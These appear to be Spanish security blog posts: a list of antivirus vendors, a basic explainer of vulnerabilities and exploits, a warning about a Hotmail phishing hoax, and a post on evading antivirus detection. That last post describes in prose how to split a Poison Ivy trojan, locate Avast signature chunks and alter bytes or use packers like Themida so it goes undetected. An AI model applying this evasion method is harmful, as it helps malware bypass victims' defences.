• Bit9 (FileAdvisor)
• Cat Computer Services (Quick Heal)
• ClamAV (ClamAV)
• CA Inc. (Vet)
• Doctor Web, Ltd. (DrWeb)
• Eset Software (ESET NOD32)
• ewido networks (ewido anti-malware)
• Fortinet (Fortinet)
• FRISK Software (F-Prot)
• F-Secure (F-Secure)
• G DATA Software (GData)
• Hacksoft (The Hacker)
• Hauri (ViRobot)
• Ikarus Software (Ikarus)
• K7 Computing (K7AntiVirus)
• Kaspersky Lab (AVP)
• McAfee (VirusScan)
• Microsoft (Malware Protection)
• Norman (Norman Antivirus)
• Panda Security (Panda Platinum)
• PC Tools (PCTools)
• Prevx (Prevx1)
• Rising Antivirus (Rising)
• Secure Computing (SecureWeb)
• BitDefender GmbH. (BitDefender)
• Sophos (SAV)
• Sunbelt Software (Antivirus)
• Symantec (Norton Antivirus)
• VirusBlokAda (VBA32)
• Trend Micro (TrendMicro)
• VirusBuster (VirusBuster)

La historia de buscar esta página surgió cuando no me podía creer lo que estaba viendo cuando aquel personaje que enjendró la idea que me llevó a escribir 5 post (Rosillo Project ) me mandó un troyano, lo analicé con Avast, con Trend, con Mcafee y … me eché a temblar. Lo había conseguido.

El peligro está ahí fuera.

Salu2!

Tirando mitos: El “pirata” informático

Los más perspicaces habréis notado una pequeña “remodelación” en el blog desde hace unos días. Se han incorporado dos RSS (sindicaciones Web) de las páginas de milw0rm y Security Focus. En las mismas se pueden ver los 3 últimos exploits publicados y las 3 últimas vulnerabilidades publicadas, aunque cómo habréis sospechado no van a la par ni corresponden la una (vulnerabilidad), con el otro (exploit), aunque están muy relacionados.

¿Habéis programado alguna vez? La mayoría estoy seguro que si, para los que no lo habéis hecho nunca programar es introducir una serie de ordenes al procesador para que las ejecute según nuestra necesidad. El ordenador como todos sabéis es tonto (o al menos el mío), por lo que hay que decirle todo paso a paso, y es más, cuando se le dice que haga algo y no puede –por falta de recursos, por que no sabe como, por que no habla tu idioma da error. ¿Qué ocurre en ese momento? Que el proceso que tenía en ese momento el control del procesador lanza una excepción y pierde el control, dando ese control a otro proceso, es una explicación bastante burda, pero estoy seguro que me entendéis. Os pongo un ejemplo:

Int a, b = 2;

Int c = 0;

a = a + b; (a = 2 + 2; a = 4)

a = a / c; (a = 4 / 0; a = error) à Excepción

En la mayoría de los casos el desarrollador ya tuvo en cuenta estas posibles excepciones, e incluía trocitos de código encargado de capturarlas y de emitir un error en pantalla, que en este caso sería un:

printf (“ Error de división por 0, la variable C no puede ser 0”)

En este caso ha quedado muy claro, son 4 líneas y es un error bastante común. Otro tipo de errores típicos son el buffer overflow, muy parecido al desbordamiento de pila , etc. etc. En todo caso son errores de programación por casos no contemplados (de ahí que diga que mi ordenador es tonto).

Una vulnerabilidad por tanto es un caso “no contemplado” (o si, pero que no se solucionó al fin y al cabo), y un exploit es un trozo de código que se aprovecha de esos casos “no contemplados” para provocar un error en un proceso, introducir su propio código y hacer lo que querramos, por ejemplo acceder a la consola de cmd del equipo atacado, lanzarle un Internet Explorer, o provocarle una denegación de servicio.

Por tanto un pirata informático es una persona que, teniendo grandes conocimientos de sistemas operativos, programación, etc. descubre algunos de estos “casos no contemplados” para provocar errores en el software, y adueñarse de otros sistemas (las motivaciones pueden ser muy diversas claro). A decir verdad es difícil ser pirata, hace falta bastante dedicación, estar un poco loco, y ser muy inteligente, por eso considero que se pueden contar con una o dos manos el número de verdaderos "piratas" que hay en el mundo. El resto se basa (nos basamos) en el trabajo de terceros, vemos exploits que otros han desarrollado, probamos vulnerabilidades que nos han contado en la carrera en nuestros propios desarrollos, o cosas parecidas. Para colmo hoy en día todo está automatizado, ya sea Nessus, ya sea Nmap, ya seas Paros Proxy, ya sea Metasploit:

Metasploit: Somos malotes y lo sabemos!

Pero de este hablaremos en próximos capitulos!

Happy Sunday!

Hoax ^2 (Hotmail)

No recuerdo la cantidad innumerable de contactos que he visto, o he conocido que tienen o han tenido un “¿Lo hizo? Averigualo en http://www.lohizo.com/, ¡averigua quien te ha eliminado! Ni la veces que he tenido que contarles la misma historia a todos, que no, que eso no vale para nada, ¿para que narices quieres saber quien te ha eliminado? Intentar explicarles un poquito sobre los “bulos” o “engaños” por Internet (en rompecadenas tenéis unos cuantos). Esta mañana abro el correo y… ¡sorpresa! La industria del malware ha desarrollado un nuevo y sofisticado código que es capaz de “espiar” a tus contactos y contarte que hablan con otras personas.

¡Un sniffer en toda regla! Lo mejor de todo es la publicidad que le dan:

El sitio es 100% gratuito, seguro, y muy f�cil de usar!

¡Vamos al sitiooooo!!!! Ahí vá, pero si es un blog de blogspot….

Jo, toy que no me aguanto por meterme

Hmmm, sospechoso,,, voy a ver el código html,,, ¡Anda, un redireccionamiento a otro sitio! Es algo así como http://xyzz.com/avisarcontactos_11.php y cuando lo abres te sale:

Hmmm, aquí se aplica aquello que decía mi madre…¡no hables con desconocidos!, ¡ni muchos menos les des tu password!

Tened cuidado, happy weekend :-)

PD: Mejor no abrir el .php no vaya a ser que nos tengamos que poner serios...

Rosillo Project (y IV)

Estaba bastante ilusionado con mostraros esta otra forma de ocultar virus, navegando por milworm encontré este video donde explicaba como “modificar” el virus hasta hacerlo indetectable por nuestro antivirus. La técnica es sencilla, una vez creado el “cliente” de nuestro troyano (sea Poison Ivy u otro), nos valdríamos de alguna herramienta de “splitting”, Dividiríamos el troyano en tantos subarchivos como precisemos, para ello nos podemos valer de aplicaciones como:

Si estáis familiarizados con Hacha, sabréis de qué estoy hablando. Es conveniente desactivar el antivirus antes de hacer estos pasos, si nuestro cliente pesa poco podemos dividir en archivos de 1 KB, con ello nos saldrán un montón de archivos, en mi caso solo 9, ya que el poison ivy es ligerito (en cliente), si pasamos el antivirus a esos 9 nos resultará:

Que concretamente los archivos 2,3,4,5 y 8 están infectados, es decir, tenemos una firma que va del archivo 2 al 5, y otra específica para el 8, por las cuales Avast detecta el troyano. Mal asunto :-) La teoría nos dice que modificando estos archivos, con cambios “inocuos” para la lógica del programa pero que cambien su firma, harán indetectable al virus:

En rojo las letras que he cambiado totalmente de forma aleatoria, mayúsculas por minúsculas o al revés, para ello he utilizado el programa HxD, disponible en softonic, ¿el problema? No se si será cosa del Avast, o de que el Poison Ivy se huele a kilómetros, pero hasta que no he tenido el archivo así:

El antivirus ha seguido detectando, y os prometo que he ido borrando línea a línea, probando carácter a carácter, vamos, ¡una tarea de chinos! Que podría ser mejorada si afinásemos la firma byte a byte, aunque nada nos garantizaría que el troyano seguiría funcionando al 100%. Por lo menos nos queda el consuelo de que, tal como se observa en el video, es posible teóricamente. Aunque uno se acuerde de las heurísticas de los antivirus… ¿El camino facil? Cifrado + Ofuscación = GL Rosillo ... Para eso estaba Themida ¿Verdad?

Salu2!

PD: Ningún ordenador fue infectado durante este experimiento.

PD2: Rosillo ha prometido hacerse un White Hack, y todos lo celebramos con el.

Rosillo Project (I)
Rosillo Project (II)
Rosillo Project (II.V)
Rosillo Project (III)

Rosillo Project (y IV)